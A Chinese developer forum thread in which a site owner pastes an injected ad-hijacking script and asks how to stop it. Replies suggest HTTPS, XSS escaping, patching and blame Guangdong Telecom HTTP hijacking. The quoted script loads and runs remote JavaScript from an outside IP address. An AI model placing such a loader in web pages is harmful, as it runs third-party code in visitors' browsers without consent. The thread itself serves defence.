问答博客标签用户活动
logo极客观点logo项目管理logoHarmonyOS
javascript
php
java
vue.js
git
html5
python
node.js
android
mysql
react.js
linux
ios
css
golang
spring
docker
程序员
logoONES 研发管理logo思否企业问答logo安谋科技 XPU

网站被注入脚本,如何解决劫持

头像
NathanHuang
    1981816

    1.自己开发的网站被注入脚本,有时候这个脚本注入成功就不影响网站访问,注入失败,网站直接就访问不了。
    2.注入失败的脚本
    图片描述

    3.脚本代码

    var _pushshowjs_ = new Object;
_pushshowjs_.expires = 10;
_pushshowjs_.param = '102398|80|80|10|1|1|';
_pushshowjs_.url = 'http://gg.zhiong.net:2525/adauto/ads/1499756747237/index.htm?SP=ABzs/PzoPOz83Lg7yXnpGRmpOgmJugy8vPzM/Pg86Dy8vPzM/Pg8/IysrPys3PyczOy7/OyczRmJuDzs3O0czL0crRxoPOg87Pzc7Hx4POz83MxseDxsbGxoOIiIjRhpCKjYyZjNGckJKDzsrPz8nNzMnJy4PNg83Pz8+Dz4POzcz=';
_pushshowjs_.adtype = '1';
_pushshowjs_.feedurl = 'http://mat.zhiong.net:2525/feedback/dataprocess/receivedata.do';
_pushshowjs_.eparam = '?SP=ABzs/PzoPOz83Lg7yXnpGRmpOgmJugy8vPzM/Pg86Dy8vPzM/Pg8/IysrPys3PyczOy7/OyczRmJuDzs3O0czL0crRxoPOg87Pzc7Hx4POz83MxseDxsbGxoOIiIjRhpCKjYyZjNGckJKDzsrPz8nNzMnJy4PNg83Pz8+Dz4POzcz=';
_pushshowjs_.realinfo = '';
_pushshowjs_.closeispush = '0';
_pushshowjs_.isAutoClose = '0';
_pushshowjs_.closeTimes = '15';

window.setTimeout(function() {
    var a = document.createElement("script");
    a.type = 'text/javascript';
    a.src = 'http://125.89.69.5:2525/pushjs/embed_mobile_V1.js';

    a.src += a.src.indexOf('?') == -1 ? '?' : '&';
    a.src += 't=' + (new Date().getTime());

    if (_pushshowjs_.adtype != '4') {
        document.getElementsByTagName("head")[0].appendChild(a);
    } else {
        document.getElementsByTagName("body")[0].appendChild(a);
        
        a = document.createElement("script");
        a.type = 'text/javascript';
        a.src = 'http://125.89.69.5:2525/pushjs/embed_mobile_V1.js';
        document.getElementsByTagName("body")[0].appendChild(a);
    }
}, 0);

    有什么办法可以解决这个劫持问题?

    javascript
    阅读 10.3k
    11 个回答
    得票最新
    头像
    lejoy
      2.2k2818
      ✓ 已被采纳

      先确认是源服务器上文件被篡改了,还是在传输过程中被篡改的:
      如果是源被篡改了,改回去,然后看看服务器是不是有什么漏洞导致被入侵;
      如果是传输过程中被篡改了,就比较麻烦。如果有条件的话,使用HTTPS

      头像
      nj_zh
        40328

        升级到HTTPS

        头像
        chanjarster
          4.2k2620

          XSS的防御办法就是回显时转义:

          1. < -> &lt;

          2. > -> &gt;

          3. & -> &amp;

          4. " -> &quot;

          5. ' -> &#39

          头像
          prolifes
            11.2k51537

            1、找到相关的代码,删除他
            2、找找网站哪里有漏洞,修复BUG,以防下次再被注入

            头像
            Whoami
              1.4k2519

              1、仔细分析下日志,确定是从网站哪个功能注入的?上传还是XSS sql,确定好后,用工具扫一下网站类似的功能模块。之后可以加应用层防火墙,改代码加安全框架

              2、如果是系统软件级别的,已知漏洞就更新,未知的就尝试换其他软件。。。

              头像
              我的神
                1k10142279
                document.getElementsByTagName("head")[0].addEventListener('DOMNodeInserted',function(){
   alert(1)
   //你看一下这个函数能帮点忙不。。。
},false);
                头像
                ufdf
                  6.7k84602709

                  使用Https

                  头像
                  ludoux
                    2
                    新手上路,请多包涵

                    是在广东吗?这个应该是广东电信的 HTTP 劫持。劫持成功在网站上会有广告的。
                    我作为用户,今天才投诉成功。

                    头像
                    simon755
                      2
                      新手上路,请多包涵

                      深圳电信用户多次遇到这个问题,打电信电话投诉,不给解决。

                      头像
                      零风子
                        44626

                        图片描述

                        查询发现域名是广州互至信息技术有限公司这家公司备案的。

                        撰写回答
                        你尚未登录,登录后可以
                        • 和开发者交流问题的细节
                        • 关注并接收问题和回答的更新提醒
                        • 参与内容的编辑和改进,让解决方法与时俱进
                        推荐问题
                        宣传栏